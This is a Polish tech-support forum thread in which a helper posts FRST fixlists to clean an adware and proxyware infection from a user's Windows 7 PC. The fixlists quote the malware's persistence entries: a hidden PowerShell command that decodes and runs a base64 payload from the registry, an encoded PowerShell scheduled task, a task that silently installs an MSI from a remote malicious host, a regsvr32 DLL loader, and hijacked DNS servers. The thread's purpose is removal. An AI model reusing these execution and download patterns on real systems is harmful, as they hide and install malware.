Witam,
Mam problem z niedziałającym antywirusem AVAST, który nie chce się uruchomić, poprzednio miałem 360 Total Security, MalwareBytes też nie chce działać.
Miałem wcześniej infekcje podczas, której wyskakiwały mi jakieś dzikie reklamy i strony oraz przekierowania ze strony na stronę, czasem wyskakiwały różne dziwne strony porno.
Posiadam Windows 7 (64bit)
LOG OTL: https://we.tl/bWdYI0CrIY
LOG EXTRAS: https://we.tl/10NvQ4UafQ
Dotychczas wykonałem skany AdwCleaner oczywiście z usuwaniem zakażonych plików, korzystałem również z ToolBarCleanera natomiast kilka pozycji nie chce się usunąć:
https://we.tl/yuSFjh661U
Z góry dzięki za pomoc
Atis
(Atis)
4 Listopad 2017 19:07
#2
Atis
(Atis)
4 Listopad 2017 19:36
#5
Odinstaluj:
mks_vir Skaner Online
Online Special Application
Online .io Application
Traffic Exchange
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :
CloseProcesses:
DeleteKey: HKCU\Software\Classes\jXMuXEbmYOGiUyr
HKU\S-1-5-19\...\RunOnce: [] => [X]
HKU\S-1-5-20\...\RunOnce: [] => [X]
HKU\S-1-5-21-1574067499-2952746644-996535552-1000\...\Run: [{3ACCDF78-177D-4F7E-B791-5A8CBB461693}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\jXMuXEbmYOGiUyr').UANXLLCLC))); <==== UWAGA
HKU\S-1-5-18\...\Run: [] => [X]
HKU\S-1-5-18\...\RunOnce: [] => [X]
Tcpip\..\Interfaces\{117C177C-4E5C-4B5E-BAA9-C8CAF8279EF5}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{1C1E6DCB-9C5C-4EAB-9A43-E894FD3694A8}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{1C1E6DCB-9C5C-4EAB-9A43-E894FD3694A8}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{3B5CB244-7C54-43A5-95B5-35C5B497B487}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{51D21037-D82F-4CB8-9B2D-50F2EF7CB311}: [NameServer] 82.163.143.176 82.163.142.178
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1574067499-2952746644-996535552-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystart.com/?pr=vmn&id=toolbarcleaner_ot&v=2_0&ent=hp_5288
Toolbar: HKU\S-1-5-21-1574067499-2952746644-996535552-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
CHR HomePage: ChromeDefaultData -> hxxp://www.luckysearch123.com?type=hp&ts=1493967308&from=d6440504&uid=samsungxssdx840xevox120gb_s1d5nsaf635635x&z=852aee7a9196ec63497161eg8zft1c0taq6m2c8eaw
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.luckysearch123.com?type=hp&ts=1493967308&from=d6440504&uid=samsungxssdx840xevox120gb_s1d5nsaf635635x&z=852aee7a9196ec63497161eg8zft1c0taq6m2c8eaw"
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
S3 KProcessHacker2; \??\C:\Program Files\kprocesshacker.sys [X]
S1 pndfwxab; \??\C:\Windows\system32\drivers\pndfwxab.sys [X]
U4 sr; Brak ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
U2 WinSnare; Brak ImagePath
2017-11-04 19:07 - 2017-11-04 19:07 - 000000000 ____D C:\_OTL
2017-10-31 23:20 - 2017-11-04 19:01 - 000000000 ____D C:\AdwCleaner
2017-10-31 23:13 - 2017-03-07 22:45 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-10-31 23:12 - 2017-03-07 22:45 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-10-30 23:04 - 2017-03-28 19:43 - 000000000 ____D C:\Program Files (x86)\Arefaphqugo
2017-10-25 17:26 - 2017-10-03 21:02 - 000000000 ____D C:\ProgramData\{80214C55-378A-FBFE-11C4-810FF900F12E}
C:\ProgramData\msjgd.exe
C:\ProgramData\mstiosu.exe
C:\Users\Maciek\bhdkriwsam.exe
C:\Users\Maciek\xkkhe.exe
CustomCLSID: HKU\S-1-5-21-1574067499-2952746644-996535552-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
ContextMenuHandlers1_S-1-5-21-1574067499-2952746644-996535552-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
ContextMenuHandlers4_S-1-5-21-1574067499-2952746644-996535552-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
ContextMenuHandlers5_S-1-5-21-1574067499-2952746644-996535552-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
Task: {291018B3-0FB6-49FA-8833-B85FFF0BF288} - System32\Tasks\{790D0A47-0478-090F-7911-057979041105} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAAgADsAOwA7ACAAIAA7ACAAOwA7ADsAOwA7ACAAIAAgADsAIAAgACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQA (dane wartości zawierają 10072 znaków więcej). <==== UWAGA
Task: {3713B4F4-37A6-4096-9162-B4CEA7C84957} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
C:\Program Files (x86)\Microleaves
Task: {39EE5D6E-259E-415A-80A2-7A1FBF00C70D} - System32\Tasks\Online Application v209 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {5309A776-DF5C-49DA-80E3-9EDB3276FFCF} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: {64A23E38-A2E1-49EB-A4EB-C307C25054B9} - System32\Tasks\{A735371E-8FA6-E3EF-8DCA-E8754D29093D} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\e8a7726c\e284e08f.dll" <==== UWAGA
Task: {6E7B8547-BF60-474D-ADA9-FCE501F71404} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {71D72DB4-9696-44E3-97E4-045539AB790B} - System32\Tasks\Ckoghtphadoward Cloud => C:\Program Files (x86)\Arefaphqugo\xprahule.exe [2017-03-28] (Glarysoft Ltd)
Task: {8ECBAECA-8073-4DEB-B349-C48CFE4463A5} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: {91217389-EEBA-44A9-8B8D-8A0C827E7713} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {EA48F3A1-841B-4ABE-A83E-FD82F86986BD} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {F6BBA712-F5C5-4A61-B2BF-9E09EBB1798D} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: {FBCFC366-C5D1-4F79-86FE-669911621C4D} - System32\Tasks\T0528 => "msiexec.exe" /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {FF66047B-99B1-4DB8-AB60-65AEA8BCCFF7} - System32\Tasks\Online Application v209 => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application v209 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application v209 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application v209.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Updater_Online_Special_Application.job => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== UWAGA
EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.
Atis
(Atis)
4 Listopad 2017 22:00
#7
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :
CloseProcesses:
R2 VSSS; C:\Users\Maciek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe [99477824 2015-06-23] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
C:\Users\Maciek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
C:\Users\Maciek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
C:\Users\Maciek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe
2017-11-04 19:42 - 2017-11-04 20:50 - 000015360 ___SH C:\Users\Maciek\Desktop\Thumbs.db
2017-11-04 19:21 - 2017-11-04 19:28 - 000074166 _____ C:\Users\Maciek\Desktop\Extras.Txt
2017-11-04 19:20 - 2017-11-04 19:27 - 000372118 _____ C:\Users\Maciek\Desktop\OTL000000.Txt
2017-11-04 19:06 - 2017-11-04 19:06 - 000602112 _____ (OldTimer Tools) C:\Users\Maciek\Desktop\OTL.exe
2017-11-04 19:03 - 2017-11-04 19:03 - 000062342 _____ C:\Users\Maciek\Desktop\OTL1222.Txt
2017-11-04 13:42 - 2017-11-04 13:42 - 002114112 _____ C:\Users\Maciek\Desktop\mksosetup.exe
2017-11-04 13:42 - 2017-11-04 13:42 - 000001022 _____ C:\Users\Maciek\Desktop\mks_vir skaner online.lnk
2017-11-04 13:42 - 2017-11-04 13:42 - 000000000 ____D C:\ProgramData\mks_vir
DeleteQuarantine:
EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.